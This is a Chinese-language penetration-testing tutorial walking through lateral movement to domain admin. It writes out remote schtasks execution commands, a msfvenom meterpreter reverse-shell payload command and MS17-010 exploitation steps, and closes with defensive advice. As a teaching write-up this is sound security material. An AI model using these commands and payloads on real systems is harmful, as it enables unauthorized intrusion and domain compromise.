域渗透实战教学文档

初始环境评估

1. 杀软检查：目标机器无杀毒软件防护
2. 域环境检查：当前机器不在域环境中
3. 密码抓取：尝试获取本地administrator密码，但未成功

渗透思路分析

情况1：机器能出网

• 直接使用Cobalt Strike(CS)上线
• 抓取本地管理员密码
• 横向移动尝试撞库
• 获取域账号后尝试攻击域机器
• 逐步扩大控制范围直至获取域控权限

情况2：机器不能出网（本案例情况）

• 检查其他协议连通性（如DNS）
• 利用IPC$连接进行横向移动
• 通过计划任务执行payload
• 检查已有net use连接
• 逐个尝试IPC$连接

具体攻击步骤

1. 通过计划任务上线

# 1. 创建批处理文件
whoami >> c:\aa\1.txt
ipconfig >> c:\aa\1.txt
netstat -ano >> c:\aa\1.txt

# 2. 复制到目标机器
copy 1.bat \\192.168.160.139\C$\windows\temp

# 3. 创建并执行计划任务
schtasks /create /tn task1 /s 192.168.160.139 /tr C:\aa\1.bat /sc ONSTART /RU system /f
schtasks /run /tn task1 /s 192.168.160.139 /i
schtasks /f /delete /tn task1 /s 192.168.160.139

2. 数据库密码挖掘

• 发现目标开放1521端口(Oracle)
• 尝试获取Oracle数据库凭证

3. 横向移动

• 成功控制192.168.160.88机器
• 抓取密码哈希
• 尝试Pass-the-Hash(PTH)攻击但失败

4. MS17-010漏洞利用

• 使用socks代理扫描C段
• 发现多台存在漏洞的机器
• 使用原生Python脚本攻击192.168.160.111

# 生成payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=12399 -f dll > axgg.dll

5. 权限提升与域渗透

• 成功获取meterpreter会话
• 发现目标为FTP服务器
• 抓取哈希后发现是域机器
• 将meterpreter会话迁移到CS
• 成功获取域管理员权限

技术要点总结

1. 计划任务利用：通过schtasks命令在远程机器上创建任务执行payload
2. 哈希传递(PTH)：尝试使用获取的哈希进行横向移动
3. 永恒之蓝利用：对存在MS17-010漏洞的机器进行攻击
4. 会话迁移：将meterpreter会话迁移到Cobalt Strike
5. 域权限提升：通过获取的域管理员凭证控制域控服务器

防御建议

1. 网络隔离：限制不必要的IPC$共享和SMB访问
2. 补丁管理：及时修复如MS17-010等高危漏洞
3. 权限控制：避免使用相同密码或哈希的工作组/域账户
4. 日志监控：监控异常的计划任务创建和远程执行行为
5. 杀毒软件：部署终端防护软件检测恶意行为

工具清单

• Cobalt Strike (CS)：C2框架
• Metasploit Framework：漏洞利用和payload生成
• 原生Python脚本：针对MS17-010的利用
• 计划任务(schtasks)：远程代码执行
• IPC$共享：横向移动通道